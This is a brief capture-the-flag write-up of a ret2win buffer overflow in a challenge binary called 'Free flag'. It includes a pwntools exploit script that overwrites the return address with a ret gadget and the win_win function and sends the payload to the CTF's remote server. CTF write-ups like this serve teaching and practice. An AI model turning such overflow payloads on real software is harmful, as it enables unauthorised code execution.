Free flag

Simple ret2win exploit.

It calls read on rbp-0x20, reading 0x38 bytes.

This is enough for 16 bytes after RBP.

We simply send 0x28 junk bytes + ret gadget + win_win function address(win_win is a function executing cat flag.txt whilst the ret gadget is for stack alignment)

For some reason I had to put an interactive session just when I connected to the server and hit control c so that the exploit continued in order for it to work...

from pwn import *
e = ELF("./chall")
NUM_TO_RET = 0x20 + 8
padding = b'A' * NUM_TO_RET
retgadget = 0x00000000004005ae # ret
payload = padding + p64(retgadget) + p64(e.symbols['win_win'])
#p = e.process()
p = remote('europe.pwn.zh3r0.ml', 3456)
p.interactive()
p.sendline(payload)
p.interactive()

PreviousCommand1 NextHelp

Last updated 5 years ago

Was this helpful?